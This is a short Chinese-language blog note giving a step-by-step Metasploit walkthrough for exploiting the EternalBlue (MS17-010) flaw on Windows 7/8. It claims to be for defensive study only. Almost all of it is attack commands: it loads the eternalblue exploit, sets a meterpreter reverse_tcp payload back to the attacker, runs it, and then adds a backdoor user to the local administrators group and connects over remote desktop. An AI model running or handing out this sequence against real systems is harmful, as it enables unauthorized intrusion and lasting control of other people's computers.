【笔记】攻击具有永恒之蓝漏洞的Windows

前言

永恒之蓝(英语:EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织影子掮客泄漏。该工具利用445/TCP端口的档案分享协议的漏洞进行散播。维基百科

本文仅用于网络信息防御学习

准备工作

  • 安装并配置好的 Metasploit Framework (传送门

  • 一台Windows7或Windows8的电脑

开始攻击

  • 由于本文为测试,所以默认已知被攻击的电脑ip为”192.169.1.1”

  • 启动 Metasploit Framework

1
msfconsole
  • 查看微软17年编号为10的漏洞
1
search ms17_010
  • 利用永恒之蓝漏洞
1
use exploit/windows/smb/ms17_010_eternalblue
  • 设置攻击手段为反弹shell(缺省值)
1
set payload windows/x64/meterpreter/reverse_tcp
  • 设置目标ip
1
set RHOST 目标IP地址
  • 设置攻击者ip地址
1
set LHOST 攻击者ip地址
  • 开始攻击
1
exploit
  • 如果攻击成功,即可获得控制权

完成

  • 取得shell后,即可在目标电脑执行命令行操作
1
meterpreter > help

后记

创建用户

<username>:用户名
<password>:密码

1
2
3
meterpreter > shell
C:\Windows\system32>net user <username> <password> /add
C:\Windows\system32>net localgroup administrators <username> /add

通过创建的用户名和密码远程桌面

  • 只能在有GUI的Kali下使用rdesktop命令
1
rdesktop <ip>:3389

参考文献

知乎——周毅刚
哔哩哔哩——千锋教育网络安全学院
51CTO公开课——陈鑫杰